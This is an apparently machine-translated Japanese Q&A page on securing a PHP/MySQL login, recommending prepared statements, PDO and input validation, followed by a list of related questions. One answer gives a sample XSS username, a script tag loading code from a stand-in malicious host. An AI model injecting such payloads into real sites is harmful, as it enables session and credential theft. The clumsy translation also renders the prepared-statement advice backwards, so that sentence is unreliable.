私は自分のウェブサイトでログイン用のアプリケーションで使用しているネットからログインスクリプトを取得していますが、より安全なものにしたいのですが、mysql実際のescape.can以外のログインを保護する方法は何ですか?あなたはまた、ハッカーが攻撃できるログインのループホールが何であるかを教えてくれます。phpmysqlで何が良いのですか?phpmysqlでログインをより安全に作成する方法mysqlの実際のエスケープ以外の方法は?
0
A
答えて
0
最も露出したサイトが学んだことを利用してください。 WordPressや、ソースコードをダウンロードできる他の主要なサイトをコピーしてください。これは再発明したいホイールではありません。
1
プリペアドステートメント/ PDOを使用すると、悪質なクエリをコードに挿入することができます。
リンク:
あなたはまだので、ユーザーはちょうど彼らが自分のユーザ名として好きなことはできませんregexであなたの入力を検証する必要があります。例えば、私のユーザ名は<script type="text/javascript" src="http://malicioussite.com/bad.js"></script>
とする。あなたが入力または出力のいずれかを消毒しない限り、あなたのすべてのページで自分のユーザー名で私の悪意のあるコードを実行することができます。
関連する問題
- 1. mysqlの入力データを安全にエスケープする方法
- 2. 私のアプリケーションのログイン情報をより安全に保存する方法は?
- 3. MySqlの外部キー、実際の動作方法
- 4. データバインディング以外の方法で<%#を使用すると安全です
- 5. 複数のドメインに安全なログインを許可する方法
- 6. Javaで安全なランダムAESキーを作成する方法は?
- 7. 最も安全な方法は、PHPでセッションを作成する
- 8. ハッシュ暗号で安全なログインページを作成する方法は?
- 9. このログインシステムをより安全にする方法
- 10. 安全な方法でASP.NET MVCアプリケーションでロールとスーパーユーザーを作成する方法
- 11. 安全なログインを作成する
- 12. magentoでmysqlをエスケープする方法は?
- 13. 安全なログインシステムを作る方法
- 14. 相対的なjava.io.Fileを作成する安全な方法
- 15. \ n以外の行区切り記号でハイブテーブルを作成する方法
- 16. 安全にmySQLデータベースにコードを挿入する方法
- 17. 安全にmysqlデータベースにAndroidを接続する方法
- 18. 安全な方法と安全でない方法のPlay Frameworkコントローラ。可能?
- 19. PHPmySqlのログインWebサイトプログラミング
- 20. カスタムアクションの作成方法0以外の値を返す
- 21. SQLカラムに対するユーザ生成式の安全な方法
- 22. Webサービススレッドを安全にする方法
- 23. キャッシュスレッドを安全にする方法
- 24. Rubyでevalを実行する安全な方法はありますか?
- 25. セッションを使用してサイト構成を保存するのは、安全で安全な方法ですか?
- 26. omniauth-openid gemを使ってOpenIDログインを安全にする方法は?
- 27. この方法でsession_startをより安全に開始できますか?
- 28. sshでリモートでスクリプトを実行する安全な方法
- 29. 実際のAPNサーバーを作成する方法と、APNサーバーのiPhoneでアプリケーションをテストする方法は?
- 30. clickonce以外の方法で公開する方法はありますか?
この貴重な情報ありがとう – test